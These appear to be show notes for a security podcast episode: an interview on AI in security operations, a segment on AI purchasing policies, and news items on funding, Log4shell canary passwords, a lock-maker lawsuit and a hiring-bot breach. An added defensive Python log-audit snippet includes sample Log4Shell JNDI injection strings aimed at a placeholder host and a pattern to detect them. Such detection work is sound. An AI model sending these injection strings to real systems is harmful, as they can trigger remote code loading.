Monzy Merza, How Much AI is Too Much, and the Weekly News – Monzy Merza – ESW #415
Segment 1: Interview with Monzy Merza - There is a Right and Wrong Way to use AI in the SOC
In the rush to score AI funding dollars, a lot of startups build a basic wrapper around existing generative AI services like those offered by OpenAI and Anthropic. As a result, these services are expensive, and don't satisfy many security operations teams' privacy requirements.
This is just the tip of the iceberg when discussing the challenges of using AI to aid the SOC. In this interview, we'll dive into the challenge of finding security vendors that care about security, the need for transparency in products, the evolving shared responsibility model, and other topics related to solving security operations challenges.
Segment 2: Topic Segment - How much AI is too much AI?
In the past few weeks, I've talked to several startup founders who are running into buyers that aren’t allowed to purchase their products, even though they want them and prefer them over the competition. Why? No AI and they’re not allowed to buy.
Segment 3: News Segment
Finally, in the enterprise security news,
- We cover the latest funding
- The Trustwave saga comes to a positive end
- Android 16 could help you evade law enforcement
- Microsoft is kicking 3rd party AV out of the kernel
- Giving AI some personality (and honesty)
- Log4shell canaries reveal password weirdness
- Denmark gives citizens copyright to their own faces to fight AI
- McDonald’s has an AI whoopsie
- Ingram Micro has a ransomware whoopsie
- Drama in the trailer lock industry
All that and more, on this episode of Enterprise Security Weekly.
Monzy Merza is a cybersecurity leader and researcher with deep expertise in security strategy, threat intelligence, and go-to-market execution. He is the Co-Founder and CEO of Crogl, Inc.
With early career experience in U.S. government cybersecurity research, Monzy is a prolific public speaker and a passionate advocate for security practitioners. Before founding Crogl, he joined the security team at a Fortune 100 bank to gain firsthand experience of the challenges security teams face daily.
Previously, Monzy served as VP of Security GTM at Databricks, where he incubated the company’s security business. Prior to that, he spent nearly a decade at Splunk in security research, product strategy, and evangelism, ultimately leading as VP, Head of Security Research. He spearheaded research initiatives adopted by thousands of customers, shaped Splunk’s $1B+ security portfolio, and significantly expanded its industry influence.
Adrian Sanabria
- FUNDING: Courtesy of the Security, Funded newsletter, issue #201 – Flip It and Reverse It
Last week's vibe check asked, "What’s the biggest distraction pulling security teams away from real progress?"
The winner was "endless compliance work", followed closely by "chasing every new vuln".
FUNDING
- Zscaler, a United States-based suite of secure access service edge and networking tools, raised a $1.5B post-IPO debt round.
- Cato Networks, an Israel-based secure access service edge (SASE) platform, raised a $359.0M Series G from Vitruvian Partners and ION Crossover Partners.
- XBOW, a United States-based autonomous application security testing platform, raised a $75.0M Series B from Altimeter Capital.
- DataBahn, a United States-based security log data management platform, raised a $17.0M Series A from Forgepoint Capital.
- Bonfy.AI, a United States-based AI-enabled data loss prevention platform focused on securing content generated by Generative AI, raised a $9.5M Seed from TLV Partners.
- Command Zero, a United States-based security operations and investigation platform, raised a $5.0M Venture Round.
ACQUISITIONS
- Trustwave, a United States-based managed security services provider (MSSP), was acquired by LevelBlue for an undisclosed amount. Trustwave had previously raised $10.0M in funding. <- something good came out of the failed merger with Cybereason!
- NEW PRODUCTS: Datadog Unveils Latest AI Agents to Rapidly Resolve Application Issues
- NEW FEATURES: Android 16’s advanced stingray protection is ready for action
- NEW FEATURES: Microsoft is moving antivirus providers out of the Windows kernel
- ESSAYS: Personality of AI Security Agents
A great fundamental point made here by my friend Nipun: it is very easy to customize the output, or "personality" of large language models, so why don't we do that to remind folks of generative AI's tendency to confidently get things wrong?
It's a really good point, and I don't have a good answer for why no one seems to be doing this.
- DUMPSTER FIRE: Rob Fuller and His Log4shell Canaries
This is WILD. Here's the content of the tweet:
_I use Log4shell canaries in my passwords and I have one per website. It’s been crazy interesting the sites that I have gotten pings for and where the pings are from. I think it’s cool. It would be a fun talk to put together and a good story to tell but not useful_
WILD BIT #1: That Rob Fuller puts Log4shell exploits in his passwords. But of course he does! I can't be too surprised.
WILD BIT #2: That he is getting "pings" off his passwords. For this to be possible, two things need to happen:
- A vulnerable version of log4j is reading the exploit string as input
- The password is handled or logged in plain text in order for a log4j function to be able to read it
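For defenders, the second condition is the one to audit for, whether or not log4j is patched. The sketch below is an added example, not part of the original show notes: it scans application log lines for credential fields logged in plain text and flags any that carry a JNDI lookup string. The log format, field names, canary hostname and the `audit` function are all assumptions made for illustration.

```python
import re

# Constructed sample log lines (not from the episode or any real system).
SAMPLE_LOG = """\
2025-07-14T10:02:11Z INFO auth login ok user=alice src=203.0.113.7
2025-07-14T10:02:15Z WARN auth login failed user=bob password=${jndi:ldap://canary.example.invalid/site-a} src=203.0.113.9
2025-07-14T10:03:40Z DEBUG api request body={"username":"carol","passwd":"hunter2"}
2025-07-14T10:04:02Z INFO web GET /search?q=${jndi:dns://canary.example.invalid/x} ua=curl/8.0
"""

# Assumed credential field names; matches key=value and JSON-style "key":"value".
CRED_FIELD = re.compile(
    r'''["']?(password|passwd|pwd|secret)["']?\s*[=:]\s*("[^"]*"|'[^']*'|\S+)''',
    re.IGNORECASE,
)
# The lookup prefix a canary string like the one in the tweet would contain.
LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def audit(log_text):
    """Return (line_number, tags, redacted_line) for every suspicious line."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        tags = []
        cred = CRED_FIELD.search(line)
        if cred:
            # Any credential value in a log is a finding on its own.
            tags.append("plaintext-credential")
            if LOOKUP.search(cred.group(2)):
                # Both conditions meet here if the logger is a vulnerable log4j.
                tags.append("lookup-in-credential")
        elif LOOKUP.search(line):
            tags.append("lookup-string")
        if tags:
            # Never echo the secret back out in the report.
            safe = CRED_FIELD.sub(lambda m: f"{m.group(1)}=<redacted>", line)
            findings.append((lineno, tags, safe))
    return findings


if __name__ == "__main__":
    for lineno, tags, safe in audit(SAMPLE_LOG):
        print(lineno, ",".join(tags), safe)
```
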
- SQUIRREL: The Best Trailer Locks?
So there's a lock manufacturer, Proven Industries. They sell trailer locks. They claim to sell "the most effective and secure products in the industry." They even have YouTube videos showing them physically destroy their competitors' products to highlight how secure their products are.
Turns out that "built with strong materials" and "secure" are different goals and outcomes when manufacturing physical security products, like locks.
Trevor McNally, the guy behind Covert Instruments, which sells all sorts of lockpicking and bypass tools for physical assessments, has a YouTube channel: McNallyOfficial. The content is very similar to the very popular Lockpicking Lawyer: short tutorials on how to bypass common (and sometimes not-so-common) locks.
It seems he hit a nerve with Proven Industries, and they claimed he faked his videos. He says they texted his wife, asked him to apologize, and are now suing him. He reacted exactly as you thought he might: buying up every one of their products he can find, and bypassing them all in under 5 seconds. He has released 6 short videos in the last month where he savagely opens dozens of Proven Locks quicker than you or I could open them with a proper key.
My theory: this won't end well for Proven Industries. The Streisand Effect is a thing, and all companies would do well to remember this.
UPDATE: Proven has dropped their lawsuits against Trevor.
Sean Metcalf
- REGULATIONS: Denmark Is Fighting AI by Giving Citizens Copyright to Their Own Faces
ADRIAN'S COMMENTS: It's always interesting when good old legal systems become the innovation the public needs to protect themselves from the tech industry.
SEAN'S COMMENTS: Perhaps the US should follow suit?
- AI WHOOPSIE: McDonald’s AI Hiring Bot Exposed Millions of Applicants’ Data to Hackers Who Tried the Password ‘123456’
ADRIAN'S COMMENTS: I swear, every time anything LLM-based is exposed to the public Internet, it seems to go off the rails. I'm not sure this is much worse than the normal hell hourly workers go through when attempting to apply for a job though.




